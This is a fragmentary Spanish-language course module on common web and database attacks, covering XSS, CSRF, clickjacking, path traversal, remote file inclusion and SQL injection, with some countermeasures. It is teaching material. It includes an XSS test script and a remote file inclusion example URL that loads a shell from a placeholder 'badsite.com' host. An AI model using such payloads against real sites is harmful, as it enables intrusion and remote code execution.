Documentos de Académico
Documentos de Profesional
Documentos de Cultura
MÓDULO 03
UdeCataluña
Top de ataques
TABLA DE CONTENIDO
1. TÉCNICAS DE ATAQUES A APLICACIONES WEB Y BASES DE DATOS .......................................... 3
1.1. Defensa en profundidad................................................................................................ 3
1.2. Pentest (Penetration Test) ............................................................................................ 5
1.3. Ataques a aplicaciones WEB ......................................................................................... 7
Ataques de inyección de Scripts .................................................................................... 8
Cross Site Scripting (XSS) ............................................................................................... 9
Cross Site Request Forgery CSRF ................................................................................. 12
ClickJacking .................................................................................................................. 13
Path Traversal (Directory Traversal)............................................................................ 15
Remote File Inclusion .................................................................................................. 16
1.4. Ataques a Bases de Datos ........................................................................................... 17
SQL Injection ............................................................................................................... 18
Blind SQL Inyection...................................................................................................... 21
2. Bibliografía .......................................................................................................................... 24
TABLA DE ILUSTRACIONES
Ilustración 1. Seguridad en Profundidad ....................................................................................... 3
Ilustración 2. Metodología Pentest NIST....................................................................................... 6
Ilustración 3 Proceso de ataque NIST............................................................................................ 6
Ilustración 4. Como funciona el protocolo HTTPS ......................................................................... 8
Ilustración 5. Ataque de Cross Site Scripting (XSS) ..................................................................... 11
Ilustración 6. Como funciona CSRF ............................................................................................. 12
Ilustración 7. Clickjacking ........................................................................................................... 14
Ilustración 8. Ejemplo Path transversal....................................................................................... 15
Ilustración 9. Shell C999 en ejecución......................................................................................... 17
Ilustración 10. Kali Linux SQLmap ............................................................................................... 18
Ilustración 11. Tabla de usuario y passwords ............................................................................. 19
Ilustración 12. SQLMap en acción ............................................................................................... 20
Ilustración 13. SQL Blind Inyection.............................................................................................. 22
Ilustración 14. Time based SQL Blind Inyection .......................................................................... 22
UdeCataluña
Top de ataques
FUENTE: http://blog.segu-info.com.ar/2010/11/defensa-en-profundidad.html
UdeCataluña
Top de ataques
UdeCataluña
Top de ataques
UdeCataluña
Top de ataques
Obtener acceso
Escalar privilegios
Alineados con este contexto vamos a revisar las técnicas más usuales de
ataques tanto a aplicaciones web como a bases de datos.
UdeCataluña
Top de ataques
UdeCataluña
Top de ataques
FUENTE://www.webscreationsdesign.com/encryption-is-not-the-same-as-security-please-take-note/
Con la aplicación del cifrado de los datos entre el cliente y el servidor web
mejora de manera sustancial la seguridad, sin embargo existen muchas técnicas
que permiten vulnerar la seguridad de una aplicación web, vamos a ver las
técnica más usuales de ataques a las aplicaciones web en el caso de que estas
estén implementadas de manera deficiente entre ellas los ataques de inyección
de scripts (Cross Site Scripting XSS, Cross Site Request Forgery CSRF y
Clickjacking), luego los ataques de inyección de LDAP y por último los ataques
de inyección de archivos.
UdeCataluña
Top de ataques
<script>alert(“Test”);</script>
UdeCataluña
Top de ataques
Las consecuencias de este ataque son variadas y depende del código que se
inserte en el mismo pero pueden pasar por la toma de control del navegador,
realización de acciones en el servidor web afectado, si el usuario al que se
afecto es administrador de la aplicación web los daños pueden ser aún mayores,
en términos generales las acciones que se puedan realizar dependerán del perfil
del usuario que resultó afectado con el ataque, el phishing es otra afectación
que se puede dar como resultado exitoso de este ataque y a través de esta
UdeCataluña
Top de ataques
FUENTE: https://dejanstojanovic.net/aspnet/2018/march/handling-cross-site-scripting-xss-in-aspnet-
mvc/
UdeCataluña
Top de ataques
FUENTE: https://www.welivesecurity.com/la-es/2015/04/21/vulnerabilidad-cross-site-request-
forgery-csrf/
Las contramedidas para protegernos de este tipo de ataques son las siguientes:
UdeCataluña
Top de ataques
Desde el punto de vista de los desarrolladores de los sitios web, evitar el uso de
acciones con solicitudes POST, comprobar los encabezados de referencia y de
manera general seguir las mejores prácticas de desarrollo posible con cada uno
de los lenguajes que se utilicen para desarrollar la página web.
ClickJacking
En esta técnica el objetivo es engañar a los usuarios para que hagan clic sobre
elementos de un sitio web en los cuales no harían clic de manera voluntaria,
esto se consigue superponiendo dos páginas, una la principal en donde se
quiere que el usuario haga clic sobre zonas específicas de la misma y la otra
sirve de señuelo superpuesta y con contenidos que inciten al usuario a que
realice clic sobre las zonas deseadas, usualmente juegos o avisos que para
poder cerrar debemos dar clic en zonas determinadas.
UdeCataluña
Top de ataques
Ilustración 7. Clickjacking
FUENTE: https://www.hacker9.com/clickjacking-attack-things-you-must-know.html
El éxito de estas técnicas depende también de varios factores como los tamaños
de las pantallas, las configuraciones de fondo de los colores de la pantalla, la
configuración del navegador web y algunos otros factores, se utiliza mucho para
conseguir que el usuario instale algún software malicioso que permita tomar
control del navegador o instalar spyware en las maquinas.
UdeCataluña
Top de ataques
FUENTE: https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/
Para la ilustración de ejemplo de path traversal vemos como a través del uso de
“../” Se consigue acceder a la carpeta del sistema operativo (Linux) que contiene
UdeCataluña
Top de ataques
include($pag)
require(&pag)
include_once($pag)
require_once($pag)
Como se observa estas funciones de PHP tienen el parámetro ($pag) que indica
la ruta del archivo a incluirse, si esta función no se valida adecuadamente puede
permitir que el usuario haga llamadas a archivos externos, por ejemplo:
http://www.miweb.com/mostrar.php?pag=http://badsite.com/shell.txt
Para este caso el sitio miweb.com cargara y ejecutara el archivo Shell.txt del
sitio badsite.com
UdeCataluña
Top de ataques
realiza esta mala práctica en el sitio web, se debe tener un estricto control de
los archivos que cargan los usuarios y tomar medidas compensatorias para
asegurarnos que se mantenga la seguridad del sitio web verificando por ejemplo
que las extensiones de los archivos sean solo las autorizadas y restringiendo la
ejecución de cualquier archivo cargado al sitio web, entre otras.
FUENTE: http://hackingscripts.com/wp-content/uploads/2014/01/c999.png
UdeCataluña
Top de ataques
consulta de parte de las organizaciones, cuando una aplicación web tiene que
acceder a estos datos para responder por las consultas de los usuarios y dejar
ver el saldo de las cuentas de los usuarios tenemos una interacción entre la
aplicación web y el servidor de base de datos, estas consultas se hacen a través
de lenguajes estructurados de consultas de bases de datos (SQL QUERYS) y si las
consultas no están debidamente protegidas damos la oportunidad al atacante
que a través de varias técnicas (de las que veremos aquí apenas las más
relevantes) acceda de manera fraudulenta a la información de la base de datos
pudiendo ocasionar incidentes de seguridad al eliminar, modificar, agregar o
consultar data de las mismas.
SQL Injection
UdeCataluña
Top de ataques
FUENTE: https://doxsec.wordpress.com/2015/08/23/how-to-use-sql_map-for-sql-injection-in-kali-
linux-mechine/
Username Password
Alexander Th4W#91/
Admin P4ssw0rd
Las consultas tal como se observa en la ilustración diez (10) se generan en PHP
como aparece en el uso de la herramienta SQLMap http://target/vuln.php?id=1
y con muchísimas otras consultas a nivel de bases de datos, lo que hacen las
herramientas automáticas que nos permiten realizar la auditoría de seguridad
es automatizar esas búsquedas y probar cientos o miles de combinaciones de
parámetros de SQL con el fin de ver cuál de ellos puede llegar a ser vulnerable,
una vez detectada la consulta que puede ser vulnerable las herramientas
prueba también con docenas de combinaciones diferentes de sentencias SQL
hasta que dan con la que permita realizar de manera exitosa la inyección de
código para acceder a la o las bases de datos.
UdeCataluña
Top de ataques
FUENTE: https://doxsec.wordpress.com/2015/08/23/how-to-use-sql_map-for-sql-injection-in-kali-
linux-mechine/
UdeCataluña
Top de ataques
La inyección ciega de SQL es una variante de ataque a bases de datos que hace
preguntas verdaderas o falsas a la base de datos y determina la respuesta en
función de cómo responda la aplicación, se usa sobre todo cuando la aplicación
web está configurada para mostrar mensajes de error genéricos (que es además
una buena práctica para no mostrar información relevante a un posible
atacante), pero que no ha mitigado el código que es vulnerable a inyección de
SQL.
Hay que notar que a pesar de que un atacante no pueda ver los datos extraídos
directamente en la base de datos, es altamente probable que al cambiar los
datos que se están enviando como parámetros se puedan realizar inferencias
sobre ellos en función de los cambios que se puedan obtener.
UdeCataluña
Top de ataques
FUENTE: https://linuxhint.com/blind_sql_injection_tutorial/
FUENTE: https://linuxhint.com/blind_sql_injection_tutorial/
UdeCataluña
Top de ataques
UdeCataluña
Top de ataques
2. Bibliografía
https://www.hacker9.com/clickjacking-attack-things-you-must-
know.html
https://linuxhint.com/blind_sql_injection_tutorial/
FUSTER, A., HERNÁNDEZ, L., MONTOYA, F., & MUÑOZ, J. Criptografía,
protección de datos y aplicaciones. Editorial: Editorial Ra-Ma (2012).
ISBN 10: 8499641369
GOMEZ, A. ENCICLOPEDIA DE LA SEGURIDAD INFORMÁTICA, 2ª Ed.
Actualizada.
Editorial: Editorial Ra-Ma (2011). ISBN 9788499640365.
MAIWALD, E. Fundamentos de Seguridad en redes. Mc. Graw-Hill.
México. 2005
MCCARTHY, M. Seguridad Digital. Mc. Graw-Hill. Madrid. 2002
NORTHCUTT, S & NOVAK J. Network Intrusion Detection.. New Rides.
Third Edition.
ISBN 0-7357-1265-4
SKOUDIS, E. & LISTON T. Counter Hack Reloaded. A Step-by-Step Guide
to Computer Attacks and Effective Defenses. Second Edition. Prentice
Hall, 2006. ISBN: 978-0-13-148104-6
STALLING, W. Fundamento de Seguridad en Redes. Pearson Education.
Madrid. 2
https://www.iana.org/domains/root/servers
UdeCataluña
Top de ataques
© UdeCataluña 2022
Bogotá - Colombia.
UdeCataluña